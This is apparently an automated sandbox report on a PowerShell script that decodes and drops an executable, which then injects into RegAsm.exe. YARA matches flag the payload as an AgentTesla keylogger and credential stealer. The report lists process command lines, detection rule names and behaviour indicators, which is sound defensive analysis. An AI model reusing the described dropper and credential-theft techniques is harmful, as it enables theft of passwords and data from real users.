Source: powershell.exe, 00000000.00000002.2070632529.0000024A93C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2107437802.0000024AAA99A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2070632529.0000024A92A72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2101310896.0000024AA28BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2070632529.0000024A93D6C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2070632529.0000024A9397E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2070632529.0000024A9397E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 3.2.x.exe.45db7d8.2.raw.unpack, R1W.cs	.Net Code: HAg81
Source: 3.2.x.exe.4617600.1.raw.unpack, R1W.cs	.Net Code: HAg81
Source: 3.2.x.exe.4653420.0.raw.unpack, R1W.cs	.Net Code: HAg81

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.x.exe.4617600.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.x.exe.4617600.1.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.x.exe.45db7d8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.x.exe.45db7d8.2.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.x.exe.4653420.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.x.exe.4653420.0.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6192, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: x.exe.0.dr

Static PE information: section name: PRSq<

PE file has nameless sections

Source: x.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\WmiApRpl.h	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\WmiApRpl.ini	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\inf\WmiApRpl\0009\	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	File created: C:\Windows\system32\PerfStringBackup.TMP	Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_02BC28D0	3_2_02BC28D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_02BC0848	3_2_02BC0848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_02BC11E0	3_2_02BC11E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_02BC28C1	3_2_02BC28C1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 3_2_02BC0839	3_2_02BC0839
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00C74A88	4_2_00C74A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00C7ECD8	4_2_00C7ECD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00C7AD88	4_2_00C7AD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00C73E70	4_2_00C73E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_00C741B8	4_2_00C741B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_053AAEE8	4_2_053AAEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_053AE410	4_2_053AE410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_053AC600	4_2_053AC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_053AAD78	4_2_053AAD78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_053AB091	4_2_053AB091
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06095270	4_2_06095270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0609C270	4_2_0609C270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0609B30A	4_2_0609B30A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06093138	4_2_06093138
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06097E50	4_2_06097E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06097770	4_2_06097770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_0609E478	4_2_0609E478
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06090007	4_2_06090007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_06090040	4_2_06090040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_060959AB	4_2_060959AB

Source: 3.2.x.exe.4617600.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.x.exe.4617600.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.x.exe.45db7d8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.x.exe.45db7d8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.x.exe.4653420.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.x.exe.4653420.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.x.exe.4653420.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.x.exe.4617600.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.x.exe.45db7d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: Process Memory Space: powershell.exe PID: 6192, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: x.exe.0.dr

Static PE information: Section: PRSq< ZLIB complexity 1.0003312993096647

Source: 3.2.x.exe.45db7d8.2.raw.unpack, KLhJmaON.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.x.exe.45db7d8.2.raw.unpack, KLhJmaON.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.x.exe.45db7d8.2.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.x.exe.45db7d8.2.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.x.exe.45db7d8.2.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.x.exe.45db7d8.2.raw.unpack, 7hO8luD.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.x.exe.45db7d8.2.raw.unpack, 9HIFdl.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 3.2.x.exe.45db7d8.2.raw.unpack, 9HIFdl.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winPS1@7/17@2/2

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_03
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
Source: C:\Windows\System32\wbem\WMIADAP.exe	Mutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3sxd0er.opv.ps1

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 7dtpow.ps1

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\7dtpow.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEFAE

Source: x.exe.0.dr

Static PE information: 0xB8E5284B [Thu Apr 19 01:50:03 2068 UTC]

Source: x.exe.0.dr	Static PE information: section name: PRSq<
Source: x.exe.0.dr	Static PE information: section name:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848D809B8 push E95ABCD0h; ret	0_2_00007FF848D809C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FF848D800BD pushad ; iretd	0_2_00007FF848D800C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4_2_053A42F8 push ebp; retf	4_2_053A4365

Source: x.exe.0.dr

Static PE information: section name: PRSq< entropy: 7.999313087046451

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\System32\wbem\WMIADAP.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

Jump to behavior

